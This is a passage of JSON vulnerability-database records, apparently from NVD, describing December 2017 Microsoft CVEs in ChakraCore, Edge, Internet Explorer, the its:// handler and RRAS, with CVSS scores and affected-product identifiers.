"CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-21T21:10:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11913", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11913", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:57", "description": "ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11914", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:00:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11914", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11914", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:58", "description": "ChakraCore allows an attacker to execute arbitrary code in the context of the current user, due to how the ChakraCore scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11916", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-21T19:54:00", "cpe": [], "id": "CVE-2017-11916", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11916", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T12:43:00", "description": "ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11918", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:01:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11918", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11918", "cvss": {"score": 7.6, "vector": 
"AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:42", "description": "ChakraCore and Windows 10 1709 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11908", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", 
"CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-21T20:27:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11908", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11908", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:53", "description": "ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11912", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-21T20:09:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11912", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11912", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:43:09", "description": "ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, and CVE-2017-11916.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11930", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11930"], "modified": "2017-12-21T20:08:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11"], "id": "CVE-2017-11930", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11930", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:15", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handle objects in memory, aka \"Scripting Engine Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11906 and CVE-2017-11919.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11887", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11887", "CVE-2017-11906", "CVE-2017-11919"], "modified": "2017-12-26T14:55:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11887", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11887", "cvss": {"score": 2.6, "vector": 
"AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:38", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11919.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11906", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11887", "CVE-2017-11906", "CVE-2017-11919"], "modified": "2017-12-26T14:56:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": 
"CVE-2017-11906", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11906", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:43:16", "description": "ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016, and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11906.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11919", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2017-11887", "CVE-2017-11906", "CVE-2017-11919"], "modified": "2017-12-26T14:58:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11919", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11919", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-05-23T19:17:33", "description": "Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow an information vulnerability due to the way the Windows its:// protocol handler determines the zone of a request, aka \"Microsoft Windows Information Disclosure Vulnerability\".", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11927", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11927"], "modified": "2022-05-23T17:29:00", "cpe": 
["cpe:/o:microsoft:windows_server_2012:*", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server:1709"], "id": "CVE-2017-11927", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11927", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:11", "description": "Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka \"Windows RRAS Service Remote Code Execution Vulnerability\".", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", 
"confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11885", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2019-04-26T15:18:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:1709", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-11885", "href": 